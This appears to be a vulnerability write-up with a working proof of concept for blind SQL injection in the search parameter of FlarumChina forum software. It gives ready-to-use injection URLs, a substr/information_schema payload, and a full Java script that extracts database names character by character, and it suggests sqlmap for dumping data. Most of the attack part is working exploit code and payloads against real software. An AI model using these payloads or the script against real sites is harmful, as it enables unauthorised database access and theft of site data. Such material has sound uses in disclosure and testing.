First, download the vulnerable program from GitHub.

Link: https://github.com/skywalker512/FlarumChina/

Vulnerable versions: <= FlarumChina-beta.7C

When the build is completed, the following image will be displayed

The SQL injection vulnerability is in the search function.

To confirm it, visit the following two links and compare the responses:

(1).http://127.0.0.1/?q=1%' and 1=1 --+

(2).http://127.0.0.1/?q=1%' and 1=2 --+

The two requests differ only in the injected condition (`1=1` versus `1=2`), yet they return different pages. This shows that the `q` parameter is vulnerable to SQL injection.

I also wrote a Java program to retrieve the database names, although it is not perfect.

Principle:

http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+

This request returns the normal page when the guessed character (`'f'` here) is correct.

My Java program uses this request as its test for each guess.
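The character-by-character logic behind this test can be sketched without any network access. The following is a minimal illustration only, not the PoC itself: the class name `BlindInferenceSketch`, the `recover` method, and the simulated oracle are all hypothetical. The oracle stands in for the "does the page look normal?" check.

```java
import java.util.function.BiPredicate;

class BlindInferenceSketch {

    // Recovers a hidden string one character at a time.
    // oracle.test(position, guess) must return true when the character at the
    // 1-based position equals guess (the "normal page" case described above).
    static String recover(BiPredicate<Integer, Character> oracle, String alphabet, int maxLen) {
        StringBuilder out = new StringBuilder();
        for (int pos = 1; pos <= maxLen; pos++) {
            boolean found = false;
            for (char c : alphabet.toCharArray()) {
                if (oracle.test(pos, c)) {
                    out.append(c);
                    found = true;
                    break;
                }
            }
            if (!found) {
                break; // no candidate matched: treat this as the end of the string
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String secret = "flarum"; // stand-in value, used only by the simulated oracle
        BiPredicate<Integer, Character> oracle =
            (pos, c) -> pos <= secret.length() && secret.charAt(pos - 1) == c;
        System.out.println(recover(oracle, "abcdefghijklmnopqrstuvwxyz_", 24));
    }
}
```

In the real script, the oracle is an HTTP request, and a guess counts as correct when the response contains a link that appears only on the normal page.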

Java PoC:

```java
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;

public class work {

    public static void main(String[] args) throws IOException {
        String str = null;
        // Outer loop: index of the database (row offset in information_schema.schemata).
        for (int j = 0; j < 6; j++) {
            String bm = String.valueOf(j);
            System.out.print(bm + ":");
            // Middle loop: character position within the database name.
            for (int i = 1; i < 25; i++) {
                String cs = String.valueOf(i);
                // Dictionary of candidate characters, one per line; the "+" entry is the end-of-name marker.
                try (BufferedReader in = new BufferedReader(new FileReader("C:\\Users\\DELL\\Desktop\\superdic.txt"))) {
                    while ((str = in.readLine()) != null) {
                        String urlPath = "http://localhost/?q=1%%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%20" + bm + ",1)," + cs + ",1)='" + str + "'%20--+";
                        URL url;
                        try {
                            url = new URL(urlPath);
                        } catch (MalformedURLException e) {
                            System.out.println("error:" + cs);
                            continue; // skip this candidate instead of using a null URL
                        }
                        URLConnection conn = url.openConnection();
                        conn.setDoInput(true);
                        StringBuilder sb = new StringBuilder();
                        try (BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()))) {
                            String line;
                            while ((line = br.readLine()) != null) {
                                sb.append(line);
                            }
                        }
                        // The normal page contains this discussion link, so the guess was correct.
                        if (sb.indexOf("http://localhost/d/2") != -1) {
                            if (!"+".equals(str)) {
                                System.out.print(str);
                            }
                            break;
                        }
                    }
                }
                // The end-of-name marker matched: move on to the next database.
                if ("+".equals(str)) {
                    break;
                }
            }
            System.out.print(" ");
        }
    }
}
```

Because I don't know how many databases there are, the outer loop runs six times for now.

As a result, the fifth line returned by the script has no output.



You can also use sqlmap directly to obtain the data.

Database:

However, most websites respond with some delay, so testing with a script is recommended.